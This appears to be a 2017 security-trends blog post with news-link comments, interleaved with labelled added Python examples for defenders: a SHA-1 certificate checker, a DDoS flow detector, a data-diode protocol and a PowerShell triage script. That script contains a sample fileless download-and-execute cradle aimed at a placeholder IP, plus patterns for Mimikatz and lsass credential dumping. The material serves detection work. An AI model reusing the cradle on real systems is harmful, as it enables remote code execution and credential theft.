Security trends 2017

2017 will not bring a turn towards better data security. The internet is rife with well-known threats, and the unknown ones are no less dangerous, while company systems are still expected to be protected. Hackers are going to continue to look for new ways to extort and steal information from businesses and organizations, which unfortunately means those businesses and organizations will have to continue to look for new ways to protect themselves.

Critical infrastructure will come under attack in 2017. Critical infrastructures must be better protected from criminals and terrorists who take advantage of the modern technologies that are essential for the functioning of society and the economy. The IT security of industrial control systems (ICS), energy grids and IoT networks needs to be improved in 2017.

There is a push for better web security in 2017. From January 2017 (Chrome 56), Google’s Chrome labels as “Not secure” any HTTP page that transmits passwords or asks for credit card details over plain-text HTTP, as the first step of a long-term plan to mark all HTTP sites as not secure.

SHA-1 is insecure; its weakened collision resistance is exactly the property certificate forgery depends on. Starting on Jan 1, 2017, CAs will have migrated to SHA-2 certificates, and the major browser makers (Microsoft, Google and Mozilla) have already announced that their browsers will no longer trust sites that use SHA-1 certificates from that date, marking those websites as insecure. A third of websites still used SHA-1 certificates as the deadline approached. SHA-1 will still hang around, like a fart in a spacesuit, for many years to come, because some operators will simply not bother to make the change.
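To find out which certificates in your own inventory are still SHA-1 signed, the following added example (not code from the original post) walks just enough DER to read the outer signatureAlgorithm OID of an X.509 certificate with the standard library only. The two sample certificates it checks are constructed inside the script: they have the real DER shape (tbsCertificate, signatureAlgorithm, signature) but dummy TBS contents and signature bytes, not real keys.

```python
"""Identify the signature algorithm of an X.509 certificate from its DER bytes.

Added example, not code from the original post. It walks just enough ASN.1/DER
to reach the outer Certificate's signatureAlgorithm field and maps its OID to
a name, so a directory of certificates can be scanned for SHA-1 signatures
with the standard library only. The sample certificates are constructed below:
real DER shape (tbsCertificate, signatureAlgorithm, signature), dummy contents.
"""
import base64

# Signature algorithm OIDs (RFC 3279, RFC 4055, RFC 5758) as dotted strings.
SIG_ALG_NAMES = {
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
    "1.2.840.113549.1.1.13": "sha512WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
    "1.2.840.10045.4.3.3": "ecdsa-with-SHA384",
}
SHA1_OIDS = {"1.2.840.113549.1.1.5", "1.2.840.10045.4.1"}


def read_tlv(buf, pos):
    """Parse one DER TLV at buf[pos]; return (tag, content, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low bits give the length of the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(content):
    """Decode OID content octets (base-128 arcs; first byte packs arcs 1 and 2)."""
    arcs = [content[0] // 40, content[0] % 40]
    acc = 0
    for b in content[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(str(a) for a in arcs)


def signature_algorithm(der):
    """Return the dotted OID of the outer signatureAlgorithm of a DER Certificate."""
    tag, cert, _ = read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("Certificate must be a SEQUENCE")
    _, _tbs, pos = read_tlv(cert, 0)           # tbsCertificate: skipped entirely
    tag, alg_id, _ = read_tlv(cert, pos)       # signatureAlgorithm ::= AlgorithmIdentifier
    tag2, oid, _ = read_tlv(alg_id, 0)
    if tag != 0x30 or tag2 != 0x06:
        raise ValueError("malformed AlgorithmIdentifier")
    return decode_oid(oid)


def classify(der):
    """Return (algorithm name, uses_sha1) for a DER certificate."""
    oid = signature_algorithm(der)
    return SIG_ALG_NAMES.get(oid, oid), oid in SHA1_OIDS


def classify_pem(pem_text):
    """Same check for a PEM file: strip the armour lines and base64-decode to DER."""
    body = "".join(l for l in pem_text.splitlines() if not l.startswith("-----"))
    return classify(base64.b64decode(body))


def to_pem(der):
    """Wrap DER bytes in PEM armour (used to build the sample PEM input)."""
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n"


# --- constructed sample certificates (DER encoders used only to build them) ---
def tlv(tag, content):
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunks = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunks.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunks))
    return bytes(out)


def sample_certificate(sig_oid):
    """Stand-in DER Certificate: dummy TBS, real AlgorithmIdentifier, dummy signature."""
    tbs = tlv(0x30, tlv(0x02, b"\x02"))                           # placeholder tbsCertificate
    alg = tlv(0x30, tlv(0x06, encode_oid(sig_oid)) + b"\x05\x00")  # OID + NULL parameters
    sig = tlv(0x03, b"\x00" + b"\xaa" * 256)                      # BIT STRING, long-form length
    return tlv(0x30, tbs + alg + sig)


if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.5", "1.2.840.113549.1.1.11"):
        print(oid, "->", classify(sample_certificate(oid)))
```

For a real file, `classify(open("cert.der", "rb").read())` or `classify_pem(open("cert.pem").read())` does the job. Two caveats: the browser deadline concerns the leaf and every intermediate, so check the whole chain, not just the server certificate; and a root CA's self-signature is not verified by browsers, so a SHA-1-signed root in the trust store does not by itself trip the warning.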

There will be changes in how security is viewed in 2017 by businesses. We will likely see cloud adoption continue to grow across the United States, network visibility will no longer just be an option, AI and machine learning will shake old security models, and IoT-powered attacks will continue to rise. All of this will factor into how businesses set up, monitor and secure their networks.

The commoditization of cyberattacks will make them more frequent in 2017. More and more companies suffer business disruption due to cyber attacks. Cyber attacks cause companies significant financial losses, yet studies show that companies are not prepared for them. According to Gartner, by 2018 only 40 per cent of large companies will have formal plans for handling cyber attacks, up from essentially none in 2015.

Strap yourself in for a bumpy ride in 2017. 2016 sucked. 2017 won’t be much better, sorry. DDoS attacks have been around since at least 2000, and they’re not going away. In fact, as the number of devices online grows, the volume and velocity of these attacks is also increasing. DDoS attack toolkits have been around for years, as have services that let you pay for an attack. Expect to see more of them. 2017 promises to be the most dramatic year yet in the DDoS conflict: whale-sized DDoS attacks will increase, the IoT will become a bigger factor in DDoS, and DDoS will overshadow ransomware as it is increasingly used for extortion. Expect the Internet of Things (IoT) and other connected devices to play an important part in these attacks.

Biometric identification will become more common in 2017, but it will not replace passwords. Fingerprint identification has become increasingly common in smartphones, and the technology is already fast and reliable. In 2016 biometric identification devices were sold for 4.5 billion dollars (most of them going into smartphones and laptops). 91 per cent of biometric sales were fingerprint sensors, four per cent face recognition and three per cent iris recognition.

Biometrics won’t kill passwords any time soon. Even though PIN codes and passwords are pretty lousy protection against a skilled cybercriminal, the password will never disappear entirely: around two per cent of the world’s population have fingerprints that do not work reliably as a biometric identifier. Other biometric identification systems have similar limitations and/or are not yet commonly available at reasonable cost. While biometrics, including fingerprint, face, iris, palm and speech recognition, will continue to grow as a more secure substitute for passwords, they will not render passwords obsolete. Until the other biometrics become commonplace, passwords are here to stay, probably until circa 2030.

The fight over encryption and backdoors is not over in 2017. Many public figures in law enforcement have consistently argued that device encryption presents a new threat to police powers of investigation. On the other side, the House Judiciary Committee’s Encryption Working Group report says encryption backdoors pose a security threat, siding with tech experts. The problem is that any mechanism allowing police to get into an encrypted system (be it a phone, a computer or a communications channel) could also be exploited by criminals. Any action in this space should weigh short-term benefits against long-term impacts. Many industry experts will rightly tell you there is no such thing as partial data encryption: you either have a fully capable system or none at all.

Given the security events of 2016, coupled with the rapid advancement and adoption of cloud computing, 2017 will be the year in which many finally accept that network infrastructure and security will have to be rethought from the ground up. In 2017 the cloud also becomes a risk for its users: cloud services will be targeted for extortion, and poorly secured IoT devices will offer openings into them.

The rivalry between network attacks and network security is accelerating. Crippling Internet services with denial-of-service attacks is becoming more common throughout the world, IoT-powered attacks will continue to rise, and stopping such an attack is not easy. For most companies the key requirement is that the attack traffic is stopped before it reaches the company’s Internet connection or servers, which increases reliance on telecom operators and external scrubbing services. In addition to disrupting service, denial-of-service attacks are often used as a distraction during the actual data theft. DDoS may take over from ransomware as the main cause for concern.
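As an added illustration of what the IoT-driven floods described above look like in the data a company can still see (not code from the original post), the following script runs a simple flood detector over constructed, NetFlow-like records: it groups flows per destination and time window and alerts when many distinct sources push a high packet rate at one target. The record layout and the thresholds are assumptions for the example.

```python
"""Flag volumetric DDoS patterns in flow records.

Added example, not code from the original post. It reads constructed,
NetFlow-like records (timestamp, source, destination, protocol, destination
port, packet count) and reports destinations that, inside a short window,
receive traffic from an unusually large number of distinct sources at a high
packet rate: the shape of an IoT-botnet flood rather than one noisy client.
The record layout and thresholds are assumptions for illustration.
"""
from collections import defaultdict

WINDOW_SECONDS = 10
MIN_DISTINCT_SOURCES = 200      # a single misbehaving client never trips this
MIN_PACKETS_PER_SECOND = 50000


def parse_flow(line):
    """'ts src dst proto dport packets' -> dict; a malformed line raises ValueError."""
    ts, src, dst, proto, dport, packets = line.split()
    return {"ts": int(ts), "src": src, "dst": dst, "proto": proto,
            "dport": int(dport), "packets": int(packets)}


def detect_floods(lines, window=WINDOW_SECONDS,
                  min_sources=MIN_DISTINCT_SOURCES, min_pps=MIN_PACKETS_PER_SECOND):
    """Group flows per (destination, window) and return alerts for flood-shaped buckets."""
    buckets = defaultdict(lambda: {"sources": set(), "packets": 0, "ports": set()})
    for line in lines:
        f = parse_flow(line)
        key = (f["dst"], f["ts"] // window * window)
        b = buckets[key]
        b["sources"].add(f["src"])
        b["packets"] += f["packets"]
        b["ports"].add((f["proto"], f["dport"]))
    alerts = []
    for (dst, start), b in sorted(buckets.items()):
        pps = b["packets"] / window
        if len(b["sources"]) >= min_sources and pps >= min_pps:
            alerts.append({"dst": dst, "window_start": start,
                           "sources": len(b["sources"]), "pps": pps,
                           "targets": sorted(b["ports"])})
    return alerts


def constructed_flows():
    """Constructed sample: 20 web clients, then a 400-source UDP/53 flood on the DNS server."""
    lines = []
    for i in range(20):
        lines.append(f"{1483228800 + i % 10} 10.0.0.{i + 1} 203.0.113.10 tcp 443 30")
    for i in range(400):
        src = f"198.51.100.{i}" if i < 256 else f"192.0.2.{i - 256}"
        lines.append(f"{1483228800 + i % 10} {src} 203.0.113.20 udp 53 2000")
    return lines


if __name__ == "__main__":
    for a in detect_floods(constructed_flows()):
        print(f"{a['dst']} @ {a['window_start']}: {a['sources']} sources, "
              f"{a['pps']:.0f} pps on {a['targets']}")
```

The limitation is the one the paragraph points at: a detector like this only sees traffic that already reached your collector, and a volumetric attack saturates the uplink first. It is useful for alerting and for feeding an operator’s scrubbing service, not as the mitigation itself, and an alert from it should also be correlated with other activity, since the flood may be the distraction.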

In 2017 IT and security professionals will talk more about business risks. Historically, firewalls, DLP, antivirus, SIEM and other technical point solutions have been the centerpiece of security conversations, but the mindset is slowly shifting from technology to risk. The goal of stopping all attacks and preventing all business impact has been recognized as a fool’s errand, and has shifted to measuring risk and minimizing business impacts. Cyber security is increasingly being viewed as a risk management problem.

In 2017 ‘security’ must be added to our existing ethical and philosophical concerns over artificial intelligence and algorithms. Algorithms will soon run the world. They already raise serious ethical and philosophical questions, and they have become the basis of fictional Armageddons.

Cyber insurance will increasingly be considered as one solution for handling cyber risks in 2017. The global cyber insurance market is expected to generate $14 billion by 2022, according to a new report published by Allied Market Research (AMR). That figure represents an impressive compound annual growth rate (CAGR) of nearly 28% from 2016 to 2022.

In 2017 Big Brother will be watching you 24/7. Those of you who’ve read George Orwell’s book 1984 or seen the movie will remember how the citizens of the fictitious totalitarian state of Oceania are constantly under surveillance by order of its dictator, Big Brother. Now swap your home desktop computer, laptop or smartphone for the fictitious telescreen: not only are you sitting in front of a modern-day version of the Big Brother telescreen, you are also walking around with one in your pocket or handbag. Sound a bit far-fetched? It is set to become a reality in many countries.

Users will want better security, or at least to feel more secure, in 2017. Many people are prepared to go to extremes for better security. According to a recent Harris Poll survey of over 2,000 adults, nearly 40% of Americans would give up sex for a year, or eating their favourite food, in exchange for better online security if it meant they’d never have to worry about being hacked. When you consider that 87 per cent of U.S. adults use the internet, it makes sense that cyber security is one of the biggest concerns today. The single biggest thing people can do to keep their online identity safe is probably the easiest: a solid password, and not giving it to other people. Still, nearly 50% of people have shared a password to an e-mail account or to an account like Netflix.

Security becomes a multi-system issue, and more people are talking about it. Design teams will have to bake security strategies in from the start, no matter how insignificant the device. The good news is that more people are talking about the issue. The real challenge is packing enough security features into designs to prevent security breaches of every sort, including those that can come from other electronics that weren’t even considered as part of the design process. Just as devices get more sophisticated, so do hackers. The reality is that security breaches can even cause physical harm. It’s time to look at this at a multi-system, multi-disciplinary level. Otherwise, we literally could be playing with fire.

Blockchains have been a big trend for several years. The blockchain market is divided as 2017 starts. During autumn 2016 we have seen a number of cooperation initiatives between the financial sector and consulting companies. Microsoft has chosen Ethereum as its blockchain platform and offers it on the Azure cloud service. IBM has jumped on the Hyperledger consortium bandwagon and offers its own blockchain on the Bluemix service. Google and Amazon are conspicuously absent. Even banks may prefer to use the cloud for their blockchains.

 

Other prediction articles worth a look:

What Lies Ahead for Cybersecurity in 2017?

Network Infrastructure, Visibility and Security in 2017

DDoS in 2017: Strap yourself in for a bumpy ride

Cybersecurity Industry Outlook: 2017 to 2021 | CSO Online

IBM’s Cybersecurity Predictions for 2017 – eForensics

https://eforensicsmag.com/ibms-cybersecurity-predictions-2017/

Top 5 Cybersecurity Threats to Watch Out for in 2017

Experts Hopeful as Confidence in Risk Assessment Falls

 

 

3,151 Comments

  1. Tomi Engdahl says:

    Mark Bergen / Bloomberg:
    YouTube’s policy changes to crack down on extremist content go into effect this week with new restrictions on viewing, sharing, and monetizing videos

    Google Begins Biggest Crackdown on Extremist YouTube Videos
    https://www.bloomberg.com/news/articles/2017-08-24/google-rolls-out-its-biggest-crackdown-on-youtube-hate-speech

    Starting on Thursday, Google will police YouTube like it never has before, adding warnings and disabling advertising on videos that the company determines crosses its new threshold for offensive content.

    YouTube isn’t removing the selected videos, but is instead setting new restrictions on viewing, sharing and making money on them.

    “These videos will have less engagement and be harder to find,”

    The new restrictions, which target what Walker called “inflammatory religious or supremacist content,” are expected to hit a small fraction of videos, according to person familiar with the company. YouTube says it uploads over 400 hours of video a minute. Videos tagged by its new policy won’t be able to run ads or have comments posted, and won’t appear in any recommended lists on the video site. A warning screen will also appear before the videos, which will not be able to play when embedded on external websites. YouTube will let video creators contest the restrictions through an appeals process, a spokeswoman said.

    Reply
  2. Tomi Engdahl says:

    Lily Hay Newman / Wired:
    Microsoft’s Lee Holmes on the company’s recent efforts to bolster security of the PowerShell framework, which has long been a high-profile target for hackers: the Trickbot malware that targets bank customers, password harvesters like Mimikatz, “fileless malware” attacks.

    Microsoft’s Bid to Save PowerShell From Hackers Starts To Pay Off
    https://www.wired.com/story/microsoft-powershell-security

    The Trickbot malware that targets bank customers. Password harvesters like Mimikatz. “Fileless malware” attacks. All three are popular hacking tools and techniques, but they’re unconnected except for one trait: They all rely in part on manipulating a Windows management tool known as PowerShell to carry out their attacks.

    Long a point of interest for security researchers, PowerShell techniques increasingly pop up in real-world attacks. Last year, well over a third of the incidents assessed by security firm Carbon Black and its partners involved some sort of PowerShell component. But as network defenders catch on to Microsoft’s recent release of additional PowerShell protections, the attack sequences that exploit PowerShell are finding some long-overdue resistance.

    A framework like PowerShell has several network security benefits, because it can facilitate tedious but necessary tasks, like pushing updates and configuration improvements across a large number of devices.

    But the same qualities that make PowerShell versatile and and easy to use—it sends trusted commands to devices throughout a network—also make it an appealing tool for attackers.

    Reply
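The attack sequences the article above lists (Trickbot, Mimikatz, fileless malware) all arrive as PowerShell command lines, so a practical defender check is to triage those command lines. The following is an added example, not code from the original post or from Microsoft: it decodes -EncodedCommand payloads (base64 of UTF-16LE, which is what powershell.exe expects) and scores a handful of launcher and payload indicators. The sample command lines are constructed here, the indicator weights are assumptions, and how the lines are collected (process-creation auditing, EDR) is outside the snippet.

```python
"""Triage PowerShell command lines for the abuse patterns the article describes.

Added example, not code from the original post or from Microsoft. It decodes
-EncodedCommand payloads and scores indicators typical of fileless launches
and credential dumping so they stand out from routine administration.
Indicator weights and sample lines are assumptions, not a vendor rule set.
"""
import base64
import re

# (pattern, weight): credential-dumping tooling is conclusive on its own,
# the launcher switches only matter in combination.
INDICATORS = {
    "encoded_command": (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), 1),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "no_profile": (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "bypass_policy": (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 1),
    "download_cradle": (re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I), 2),
    "invoke_expression": (re.compile(r"\biex\b|invoke-expression", re.I), 1),
    "credential_dump": (re.compile(r"invoke-mimikatz|sekurlsa|lsass", re.I), 3),
    "reflective_load": (re.compile(r"frombase64string|\[reflection\.assembly\]::load", re.I), 2),
}
ALERT_THRESHOLD = 3


def encode_for_powershell(script):
    """Produce the -EncodedCommand argument form (used here to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the line carries -EncodedCommand, else None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(cmdline):
    """Score one command line over both its literal text and any decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = sorted(name for name, (rx, _) in INDICATORS.items() if rx.search(text))
    score = sum(INDICATORS[name][1] for name in hits)
    return {"decoded": decoded, "indicators": hits, "score": score}


def triage(cmdlines, threshold=ALERT_THRESHOLD):
    """Return the lines worth an analyst's attention, with their analysis."""
    results = [(line, analyse(line)) for line in cmdlines]
    return [(line, r) for line, r in results if r["score"] >= threshold]


# Constructed samples: two routine admin launches and two attack-style ones.
BENIGN_SERVICE_CHECK = 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'
BENIGN_SCRIPT = 'powershell.exe -ExecutionPolicy RemoteSigned -File C:\\ops\\patch.ps1'
FILELESS_CRADLE = ("powershell.exe -nop -w hidden -ep bypass -enc "
                   + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.1/a.ps1')"))
CREDENTIAL_DUMP = 'powershell.exe -Command "Invoke-Mimikatz -DumpCreds"'
SAMPLE_LINES = [BENIGN_SERVICE_CHECK, BENIGN_SCRIPT, FILELESS_CRADLE, CREDENTIAL_DUMP]

if __name__ == "__main__":
    for line, r in triage(SAMPLE_LINES):
        print(r["score"], r["indicators"], line[:60])
```

Decoding the payload before matching is the point: without it the fileless cradle only shows its launcher switches, and the download and IEX indicators that make it conclusive stay hidden inside the base64 blob.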
  3. Tomi Engdahl says:

    Joseph Marks / Defense One:
    Eight out of 28 of Trump’s Homeland Security cybersecurity panel resign, citing “insufficient attention” to the issues, Charlottesville comments, more

    Trump Cybersecurity Advisers Resign In ‘Moral’ Protest
    http://www.defenseone.com/politics/2017/08/trump-cybersecurity-advisers-resign-moral-protest/140535/

    Board members also condemned the president’s response to racist violence in Charlottesville, Va.

    More than one-quarter of a panel tasked with advising the Homeland Security Department on cybersecurity and infrastructure protection resigned en masse Monday, citing President Donald Trump’s “insufficient attention” to the nation’s cyber vulnerabilities, among other complaints.

    “The moral infrastructure of our nation is the foundation on which our physical infrastructure is built,” the council members stated in a group resignation letter.

    “Your actions have threatened the security of the homeland I took an oath to protect,” the letter writers tell the president.

    The resignations come after Trump disbanded two business advisory councils earlier this month following a wave of resignations by chief executive officers. Those CEOs similarly condemned Trump’s response to the violence in Charlottesville.

    The former infrastructure council members particularly faulted Trump administration efforts to ensure the digital security of election systems.

    “You have given insufficient attention to the growing threats to the cybersecurity of the critical systems upon which all Americans depend, including those impacting the systems supporting our democratic election process,” the letter states.

    Reply
  4. Tomi Engdahl says:

    WannaCrypt NHS victim Lanarkshire infected by malware again
    Infect me once, shame on you. Infect me twice …
    https://www.theregister.co.uk/2017/08/28/wannacrypt_nhs_victim_lanarkshire_infected_by_malware_again/

    One of the UK National Health Service boards hit by WannaCrypt earlier this year has again been infected by malware.

    The Lanarkshire board manages the Hairmyres Hospital, Monklands Hospital, and Wishaw General Hospital in Scotland, and on Friday had to warn patients that it was only handling emergency cases.

    Lanarkshire was one of the many NHS districts hit by the WannaCrypt ransomware attack earlier this year.

    The latest infection took out the hospital’s staff rostering and telephone systems, and on Saturday morning NHS Lanarkshire posted this brief statement on its Facebook page:

    “Due to NHS Lanarkshire IT issues, the staff bank system and telephone are offline and currently unavailable”

    At the time, NHS Lanarkshire expected a 72 hour outage, and CEO Calum Campbell attributed the outage to malware, with systems taken offline to contain the outbreak with help from its IT provider.

    It posted an update requesting that people avoid visiting emergency departments unless absolutely necessary.

    Appointments would be re-scheduled.

    Reply
  5. Tomi Engdahl says:

    Google routing blunder sent Japan’s Internet dark on Friday
    Another big BGP blunder
    https://www.theregister.co.uk/2017/08/27/google_routing_blunder_sent_japans_internet_dark/

    Last Friday, someone in Google fat-thumbed a Border Gateway Protocol (BGP) advertisement and sent Japanese Internet traffic into a black hole.

    The trouble began when The Chocolate Factory “leaked” a big route table to Verizon, the result of which was traffic from Japanese giants like NTT and KDDI was sent to Google on the expectation it would be treated as transit.

    Since Google doesn’t provide transit services, as BGP Mon explains, that traffic either filled a link beyond its capacity, or hit an access control list, and disappeared.

    The outage in Japan only lasted a couple of hours, but was so severe that Japan Times reports the country’s Internal Affairs and Communications ministries want carriers to report on what went wrong.

    BGP Mon dissects what went wrong here, reporting that more than 135,000 prefixes on the Google-Verizon path were announced when they shouldn’t have been.

    Since it leaked what the monitors call “a full table” to Verizon, the fat-thumb error also provided a “peek into what Google’s peering relationships look like and how their peers traffic engineer towards Google”.

    BGP leak causing Internet outages in Japan and beyond.
    https://bgpmon.net/bgp-leak-causing-internet-outages-in-japan-and-beyond/

    A closer look at our data shows not only BGP hijack incidents but also a high number of BGP leak events. A random example is this one: 171.5.0.0/17 announced by AS45629 (Jastel out of Thailand), which all of a sudden became reachable with Google as a provider for Jastel.

    In the example above we can see how Google accidentally became a transit provider for Jastel by announcing peer prefixes to Verizon. Since verizon would select this path to Jastel it would have sent traffic for this network towards Google. Not only did this happen for Jastel, but thousands of other networks as well.

    Google is not a transit provider and traffic for 3rd party networks should never go through the Google network. Jastel has a few upstream providers and with the addition of Google and Verizon to the path, it’s likely only Verizon customers (which is still significant) would have chosen this path and only those that had no other alternative or specifically prefered Verizon over shorter paths. However this is just the start.

    A word about traffic engineering
    Google is one of the largest (CDN) networks in the world. It has an open peering policy and is extremely well connected with many peers. It’s also the source of a large amount of traffic with popular websites such as Youtube, Google search, Google Drive, Google Compute, etc. As a result many networks exchange a significant volume of traffic with just Google and those with direct peering with Google will want to make sure Google picks the right peering link with them. So as result large networks will start to deploy traffic engineering tricks to make sure traffic flows over the correct peering links with Google. The most powerful trick in the book is to start de-aggregating and announce more specifics. This means no matter the AS path length or whatever local-pref Google sets locally, the more specific prefixes are always preferred.

    A unique insight into Google’s network

    Since Google essentially leaked a full table towards Verizon, we get to peek into what Google’s peering relationships look like and how their peers traffic engineer towards Google. Analyzing this data set we find many more specific prefixes. Meaning prefixes that are not normally seen in the global Internet routing table (DFZ) and only made visible to Google for traffic engineering requirements.

    Reply
  6. Tomi Engdahl says:

    AI Training Algorithms Susceptible To Backdoors, Manipulation
    https://slashdot.org/story/17/08/27/0553203/ai-training-algorithms-susceptible-to-backdoors-manipulation

    Three researchers from New York University (NYU) have published a paper this week describing a method that an attacker could use to poison deep learning-based artificial intelligence (AI) algorithms. Researchers based their attack on a common practice in the AI community where research teams and companies alike outsource AI training operations using on-demand Machine-Learning-as-a-Service (MLaaS) platforms.

    https://arxiv.org/pdf/1708.06733v1.pdf

    Reply
  7. Tomi Engdahl says:

    Sarahah’s anonymous messaging application suddenly shot to the top of the app download statistics. Sarahah has been at the top of the download lists in both the Google and Apple app stores.

    Now a security researcher has revealed unpleasant things.

    Bishop Fox analyst Zachary Julian noticed with Burp Suite that Sarahah sends information out of the Android phone. The application may ask permission to read the phonebook at installation, but at no time does it reveal that it is sending the data onward.

    At first startup, Sarahah transfers phone numbers and email addresses from the phone to the manufacturer’s server. The spyware feature applies to both Android and iOS versions.

    The author of The Intercept’s story reminds us that it is not just a matter of one’s own data ending up with a company. Additionally, there is a risk that the data on that company’s server will end up in a data breach.

    The program’s description claims that contact list information is used to tell the user which friends are also Sarahah users. But it does not do that. Such a feature expressly defies the fundamental principle of the program as a whole: if there are only a handful of users in one’s circle of friends, it is easy to find out who the “anonymous” questions from the application come from.

    Source: http://www.tivi.fi/Kaikki_uutiset/uusi-hittisovellus-urkkii-salaa-tietoja-6671950

    Reply
  8. Tomi Engdahl says:

    UK seeks early deal with EU on post-Brexit data sharing
    Britain to argue that there should be no substantial regulatory changes as a result of leaving the EU
    https://www.theguardian.com/technology/2017/aug/24/uk-seeks-early-deal-with-eu-on-post-brexit-data-sharing

    The government is seeking to negotiate a deal over data sharing with Europe in which there are no substantial regulatory changes as a result of Brexit.

    The ambitious strategy emerged on Thursday in the last of a series of summer policy papers published by the Department for Exiting the European Union ahead of the next round of talks in Brussels on Monday.

    In it, the government argues that its “unique” status as a leading player in the world of electronic commerce means that it should be able to demand special treatment from the EU when agreeing future standards.

    Reply
  9. Tomi Engdahl says:

    SD Card Data Diode System
    https://hackaday.io/project/21568-sd-card-data-diode-system

    A system to transfer files from an airgapped PC to an non-airgapped PC by dumping files from SD card to serial port back to another SD card.

    Using 2 Arduino Uno’s with an SD card shield and the SD card libraries, and a working serial data diode design, I hope to build a system to transfer files from one SD card to another without the possibility for the receiving side to talk back to the transmitting side.

    Reply
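The hard part of the data diode design above is not the hardware but the protocol: the receiving side can never say “send that again”, so every frame must carry what the receiver needs to detect loss and corruption on its own. The following added example (not the Hackaday project’s code) shows one such framing with a sequence number, total count, length and CRC-32, plus sender-side repetition as the only recovery mechanism; the frame layout and repeat count are assumptions of the example, and the serial link itself is replaced by a simulated lossy channel.

```python
"""One-way file transfer framing for a serial data diode.

Added example, not the Hackaday project's own code. A receiver behind a data
diode can never ask for a retransmission, so each frame must carry everything
needed to detect loss and corruption on the receiving side alone: a magic
marker, a sequence number, the total frame count, a payload length and a
CRC-32. The sender repeats the whole file a configurable number of times
(forward redundancy), the only recovery strategy available when there is no
channel back to the sender. Frame layout and repeat count are assumptions.
"""
import struct
import zlib

MAGIC = b"DIO1"
HEADER = struct.Struct(">4sIIH")      # magic, seq, total frames, payload length
CHUNK_SIZE = 64


def frame_file(data, chunk=CHUNK_SIZE, repeats=2):
    """Split data into frames (header + payload + CRC-32 over both), repeated."""
    chunks = [data[i:i + chunk] for i in range(0, len(data), chunk)] or [b""]
    frames = []
    for _ in range(repeats):
        for seq, payload in enumerate(chunks):
            body = HEADER.pack(MAGIC, seq, len(chunks), len(payload)) + payload
            frames.append(body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF))
    return frames


class Receiver:
    """Reassembles frames; never emits anything towards the sender."""

    def __init__(self):
        self.parts, self.total, self.bad = {}, None, 0

    def feed(self, frame):
        if len(frame) < HEADER.size + 4:
            self.bad += 1
            return
        body, crc = frame[:-4], struct.unpack(">I", frame[-4:])[0]
        if zlib.crc32(body) & 0xFFFFFFFF != crc:
            self.bad += 1                   # corrupted in transit: discard, wait for a repeat
            return
        magic, seq, total, length = HEADER.unpack(body[:HEADER.size])
        if magic != MAGIC or len(body) != HEADER.size + length:
            self.bad += 1
            return
        self.total = total
        self.parts.setdefault(seq, body[HEADER.size:])   # first good copy wins

    def missing(self):
        return sorted(set(range(self.total or 0)) - set(self.parts))

    def assemble(self):
        if self.total is None or self.missing():
            return None                    # incomplete: only a further repeat can fix it
        return b"".join(self.parts[i] for i in range(self.total))


def simulate(data, dropped=(), corrupted=()):
    """Push frames through a channel that drops/corrupts some by index; return (file, missing, bad)."""
    rx = Receiver()
    for i, frame in enumerate(frame_file(data)):
        if i in dropped:
            continue
        if i in corrupted:
            frame = frame[:-1] + bytes([frame[-1] ^ 0xFF])   # flip a CRC byte
        rx.feed(frame)
    return rx.assemble(), rx.missing(), rx.bad
```

On a real serial link the frames are simply written in order by the sending Arduino and read by the receiving one; because these frames are length-prefixed rather than delimited, a byte-oriented link that can lose bytes mid-frame also needs a resynchronisation marker (a start-of-frame byte or COBS encoding) so the receiver can find the next header after corruption. What never changes is that the receiver only reports what it is missing locally; it has no way to ask for it.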
  10. Tomi Engdahl says:

    OpenJDK may tackle Java security gaps with secretive group
    The private group would tackle code vulnerabilities that currently are handled without coordination—or not at all
    https://www.infoworld.com/article/3219831/java/openjdk-may-tackle-java-security-gaps-with-secretive-group.html

    To shore up Java’s security, a private group that operates outside the normal open source community process is under consideration.

    The proposed OpenJDK (Java Development Kit) Vulnerability Group would provide a secure, private forum in which trusted members of the community receive reports on vulnerabilities in code bases and then review and fix them. Coordinating the release of fixes also would be part of the group’s mandate. (Java SE, the standard edition of Java, has been developed under the auspices of OpenJDK.)

    The vulnerability group and Oracle’s internal security teams would work together, and it may occasionally need to work with external security organizations.

